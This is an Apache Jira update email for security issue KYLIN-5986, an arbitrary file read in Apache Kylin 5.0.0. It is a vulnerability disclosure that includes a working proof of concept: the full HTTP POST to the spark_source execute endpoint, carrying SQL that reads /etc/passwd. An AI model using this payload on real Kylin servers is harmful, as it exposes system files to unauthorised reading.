[jira] [Updated] (KYLIN-5986) [Security] Apache kylin read any file

Longfei Jiang (Jira) Wed, 12 Feb 2025 19:35:12 -0800


     [ 
https://issues.apache.org/jira/browse/KYLIN-5986?page=com.atlassian.jira.plugin.system.issuetabpanels:all-tabpanel
 ]


Longfei Jiang updated KYLIN-5986:
---------------------------------
    Description: 
*1. start kylin-docker*


```sh
docker run --platform=linux/amd64 -d     --name Kylin5-Machine     --hostname 
localhost     -e TZ=UTC     -m 10G     -p 7070:7070     -p 8088:8088     -p 
9870:9870     -p 8032:8032     -p 8042:8042     -p 2181:2181     
apachekylin/apache-kylin-standalone:5.0.0-GA
```

*2. change kylin.properties*

Add `kylin.env.channel=cloud` into the file `kylin.properties`. This is to make 
`org.apache.kylin.rest.controller.SparkSourceController` work
 !image-2025-02-13-11-11-05-091.png! image.png

*3. restart server*

```
./kylin.sh stop
./kylin.sh start
```


# Exploit


1.Log in to the backend using an administrator account

2.http access `/kylin/api/spark_source/execute` to execute spark sql

```http
POST /kylin/api/spark_source/execute HTTP/1.1
Host: 127.0.0.1:7070
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 
(KHTML, like Gecko) Chrome/125.0.0.0 Safari/537.36 Viewer/99.9.8782.87
Accept: application/vnd.apache.kylin-v4+json
Accept-Language: cn
Accept-Encoding: gzip, deflate, br
Auto: false
X-Requested-With: XMLHttpRequest
DNT: 1
Connection: keep-alive
Referer: http://127.0.0.1:7070/kylin/
Cookie: 
c24882d0760bcad26b31ef95baaaa0ed96ea8fd461b11a9695cff5e969b6d4da=MTI5MjBjZGUtNDk1Yi00YzNhLTk4OTYtMmNhOWYwZDU1MWY2;
 session=c354aed6-c0e1-4463-98de-c26bc4df312f.o-aV6G0ydMKHAQ43gc1Cc0tOndE
Sec-Fetch-Dest: empty
Sec-Fetch-Mode: cors
Sec-Fetch-Site: same-origin
sec-ch-ua-platform: "Windows"
sec-ch-ua: "Google Chrome";v="125", "Chromium";v="125", "Not=A?Brand";v="24"
sec-ch-ua-mobile: ?0
Content-Type: application/json
Content-Length: 94

{"sql":"CREATE TABLE temp_tablea AS SELECT * from 
text.`file:///etc/passwd`","database":"SSB"}
```
 !image-2025-02-13-11-11-30-021.png! image.png
3.Add new source


 !image-2025-02-13-11-11-40-004.png! image.png

4.Click `Refresh now` ,this is to load tables;


 !image-2025-02-13-11-11-48-871.png! image.png


5.Execute the sql statement `select * from SSB.TEMP_TABLEA` to get the contents 
of the `/etc/passwd` file

 !image-2025-02-13-11-11-57-464.png! image.png


The detailed information can be found in the email attachment: Fwd_ 
[Security]Apache kylin read any file.eml


  was:
##  1. start kylin-docker


```sh
docker run --platform=linux/amd64 -d     --name Kylin5-Machine     --hostname 
localhost     -e TZ=UTC     -m 10G     -p 7070:7070     -p 8088:8088     -p 
9870:9870     -p 8032:8032     -p 8042:8042     -p 2181:2181     
apachekylin/apache-kylin-standalone:5.0.0-GA
```

##  2. change kylin.properties

Add `kylin.env.channel=cloud` into the file `kylin.properties`. This is to make 
`org.apache.kylin.rest.controller.SparkSourceController` work
 !image-2025-02-13-11-11-05-091.png! image.png
## 3. restart server

```
./kylin.sh stop
./kylin.sh start
```


# Exploit


1.Log in to the backend using an administrator account

2.http access `/kylin/api/spark_source/execute` to execute spark sql

```http
POST /kylin/api/spark_source/execute HTTP/1.1
Host: 127.0.0.1:7070
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 
(KHTML, like Gecko) Chrome/125.0.0.0 Safari/537.36 Viewer/99.9.8782.87
Accept: application/vnd.apache.kylin-v4+json
Accept-Language: cn
Accept-Encoding: gzip, deflate, br
Auto: false
X-Requested-With: XMLHttpRequest
DNT: 1
Connection: keep-alive
Referer: http://127.0.0.1:7070/kylin/
Cookie: 
c24882d0760bcad26b31ef95baaaa0ed96ea8fd461b11a9695cff5e969b6d4da=MTI5MjBjZGUtNDk1Yi00YzNhLTk4OTYtMmNhOWYwZDU1MWY2;
 session=c354aed6-c0e1-4463-98de-c26bc4df312f.o-aV6G0ydMKHAQ43gc1Cc0tOndE
Sec-Fetch-Dest: empty
Sec-Fetch-Mode: cors
Sec-Fetch-Site: same-origin
sec-ch-ua-platform: "Windows"
sec-ch-ua: "Google Chrome";v="125", "Chromium";v="125", "Not=A?Brand";v="24"
sec-ch-ua-mobile: ?0
Content-Type: application/json
Content-Length: 94

{"sql":"CREATE TABLE temp_tablea AS SELECT * from 
text.`file:///etc/passwd`","database":"SSB"}
```
 !image-2025-02-13-11-11-30-021.png! image.png
3.Add new source


 !image-2025-02-13-11-11-40-004.png! image.png

4.Click `Refresh now` ,this is to load tables;


 !image-2025-02-13-11-11-48-871.png! image.png


5.Execute the sql statement `select * from SSB.TEMP_TABLEA` to get the contents 
of the `/etc/passwd` file

 !image-2025-02-13-11-11-57-464.png! image.png


The detailed information can be found in the email attachment: Fwd_ 
[Security]Apache kylin read any file.eml



> [Security] Apache kylin read any file
> -------------------------------------
>
>                 Key: KYLIN-5986
>                 URL: https://issues.apache.org/jira/browse/KYLIN-5986
>             Project: Kylin
>          Issue Type: Bug
>    Affects Versions: 5.0.0
>            Reporter: Longfei Jiang
>            Priority: Major
>             Fix For: 5.0.1
>
>         Attachments: Fwd_ [Security]Apache kylin read any file.eml, 
> image-2025-02-13-11-11-05-091.png, image-2025-02-13-11-11-30-021.png, 
> image-2025-02-13-11-11-40-004.png, image-2025-02-13-11-11-48-871.png, 
> image-2025-02-13-11-11-57-464.png
>
>
> *1. start kylin-docker*
> ```sh
> docker run --platform=linux/amd64 -d     --name Kylin5-Machine     --hostname 
> localhost     -e TZ=UTC     -m 10G     -p 7070:7070     -p 8088:8088     -p 
> 9870:9870     -p 8032:8032     -p 8042:8042     -p 2181:2181     
> apachekylin/apache-kylin-standalone:5.0.0-GA
> ```
> *2. change kylin.properties*
> Add `kylin.env.channel=cloud` into the file `kylin.properties`. This is to 
> make `org.apache.kylin.rest.controller.SparkSourceController` work
>  !image-2025-02-13-11-11-05-091.png! image.png
> *3. restart server*
> ```
> ./kylin.sh stop
> ./kylin.sh start
> ```
> # Exploit
> 1.Log in to the backend using an administrator account
> 2.http access `/kylin/api/spark_source/execute` to execute spark sql
> ```http
> POST /kylin/api/spark_source/execute HTTP/1.1
> Host: 127.0.0.1:7070
> User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 
> (KHTML, like Gecko) Chrome/125.0.0.0 Safari/537.36 Viewer/99.9.8782.87
> Accept: application/vnd.apache.kylin-v4+json
> Accept-Language: cn
> Accept-Encoding: gzip, deflate, br
> Auto: false
> X-Requested-With: XMLHttpRequest
> DNT: 1
> Connection: keep-alive
> Referer: http://127.0.0.1:7070/kylin/
> Cookie: 
> c24882d0760bcad26b31ef95baaaa0ed96ea8fd461b11a9695cff5e969b6d4da=MTI5MjBjZGUtNDk1Yi00YzNhLTk4OTYtMmNhOWYwZDU1MWY2;
>  session=c354aed6-c0e1-4463-98de-c26bc4df312f.o-aV6G0ydMKHAQ43gc1Cc0tOndE
> Sec-Fetch-Dest: empty
> Sec-Fetch-Mode: cors
> Sec-Fetch-Site: same-origin
> sec-ch-ua-platform: "Windows"
> sec-ch-ua: "Google Chrome";v="125", "Chromium";v="125", "Not=A?Brand";v="24"
> sec-ch-ua-mobile: ?0
> Content-Type: application/json
> Content-Length: 94
> {"sql":"CREATE TABLE temp_tablea AS SELECT * from 
> text.`file:///etc/passwd`","database":"SSB"}
> ```
>  !image-2025-02-13-11-11-30-021.png! image.png
> 3.Add new source
>  !image-2025-02-13-11-11-40-004.png! image.png
> 4.Click `Refresh now` ,this is to load tables;
>  !image-2025-02-13-11-11-48-871.png! image.png
> 5.Execute the sql statement `select * from SSB.TEMP_TABLEA` to get the 
> contents of the `/etc/passwd` file
>  !image-2025-02-13-11-11-57-464.png! image.png
> The detailed information can be found in the email attachment: Fwd_ 
> [Security]Apache kylin read any file.eml



--
This message was sent by Atlassian Jira
(v8.20.10#820010)

[jira] [Updated] (KYLIN-5986) [Security] Apache kylin read any file

Reply via email to